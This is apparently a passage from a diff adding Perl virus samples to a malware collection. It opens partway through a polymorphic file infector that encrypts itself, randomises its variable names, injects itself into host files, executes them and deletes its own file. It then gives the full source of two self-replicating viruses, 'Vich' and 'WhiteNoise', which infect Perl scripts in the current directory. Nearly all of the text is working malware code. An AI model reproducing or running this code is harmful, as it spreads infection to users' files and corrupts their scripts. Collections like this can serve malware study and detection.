@Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { "; # Decrypt Loop
if ( $crypttype == 0 ){
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;"; # Decrypt Char
} else {
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;"; # Decrypt Char
}
@Vir[5] = "}";
@Vir[6] = "open(1l1, \">$filename\")\;"; # write encrypted
@Vir[7] = "print 1l1 \$l11\;"; # string to a file
@Vir[8] = "close(1l1)\;";
@Vir[9] = "\$lll = \`perl $filename\`;\n"; # and start it
# change variables
# $Virus File @Virus $X $Key $Vir
# l1l 1l1 ll1 lll 11l l11
@vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
foreach $replace (@vars){
$newVar = chr(int(rand(25)+65)); # with a letter
$newVar .= int(rand(65535)); # and a random number
for ( $b=0; $b < @Vir; $b++){
@Vir[$b] =~ s/$replace/$newVar/g ;
}
}
do {
chomp @Temp[0];
@Temp[0] .= " \n";
} until((length(@Temp[0]) % 5) == 0 );
open(File, ">$FileName"); # and write the infected
$Temp = join("\n", @Vir);
for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
if ( @Temp[$X] =~ "\;\n" ) { # insert virus in the middle
$Temp2 = join("", @Temp[0..$X]); # write first part
print File $Temp2; # and virus
print File $Temp; $X++;
$Y = (@Temp);
$Temp2 = join("", @Temp[$X..$Y]); # insert rest of the file
print File $Temp2;
goto CloseFile;
}
}
$Temp2 = join("", @Temp); # no possibility to insert virus
print File $Temp; # file back to disk
print File $Temp2; # without EPO
CloseFile:
close(File);
}}}}
$a = `rm $0`; # delete our selves..

87
Perl/Virus.Perl.Vich Normal file
View File

@ -0,0 +1,87 @@
#onehalf3554
# this perl virus (c)Chernickevich Konstantin
# http://onehalf.hotmail.ru
# email:onehalf3554@mail.ru
system"clear";
$partone="#End_my";
$parttwo="_body";
$EndMarker=$partone.$parttwo;
$infected=0;
$BodyCopy=0;
$textold="";
# this "while" for detecting *.pl file
# and output in the $_ local perl variable
while (<*.pl>)
{
$files=$_;
$text="<".$_;
$textw=">".$_;
$textww=">>".$_;
open(TESTFILE,$text);
until(eof(TESTFILE))
{
$strres=readline(TESTFILE);
# this procedure detecting a marker in the *.pl file
# if marker detected then file infected if not then file not infected!
if ($strres=~ m/onehalf3554/i)
{
if ($BodyCopy==0)
{
$BodyCopy=1;
open(VIRUSBODY,$text);
until ($BodyStr=~ m/$EndMarker/i)
{
$BodyStr=readline(VIRUSBODY) ;
$BodyLoopCount++;
$BodyArray[$BodyLoopCount]=$BodyStr;
}
close(VIRUSBODY);
}
$infected=1;
}
}
close (TESTFILE);
if ($infected==1)
{
print "[im detecting old infecting file :]\n";
print $textw." infected old time.[Ok]\n";
open(RESERVBODY,">body.bod");
print RESERVBODY @BodyArray;
close(RESERVBODY);
}
if ($infected==0)
{
print $textw."im trying infecting this file now! \n";
system "cp ".$files." temp.bod";
open(NULFILE,$textww);
$NUL="";
print NULFILE $NUL;
system "cp body.bod"." ".$files;
open(DATAFILE,"<temp.bod");
until(eof(DATAFILE))
{
$reloader=readline(DATAFILE);
print NULFILE $reloader;
}
close(DATAFILE);
close(NULFILE);
}
}
#End_my_body

23
Perl/Virus.Perl.WhiteNoise.a Normal file
View File

@ -0,0 +1,23 @@
open(File,$0);
@Vir=<File>;
#BlackJack
@Virus=@Vir[-23...-1];
close(File);
foreach $FileName (<*>)
{
if ((-r $FileName) && (-w $FileName) && (-f $FileName))
{
open(fuck, "$FileName");
@aFucks=<fuck>;
close(fuck);
if ((@aFucks[0] =~ "perl") || (@aFucks[1] =~ "perl"))
{
if ( not (@aFucks[-21] =~ "BlackJack"))
{
open(fuck, ">>$FileName");
print fuck @Virus;
close(fuck);
}
}
}
}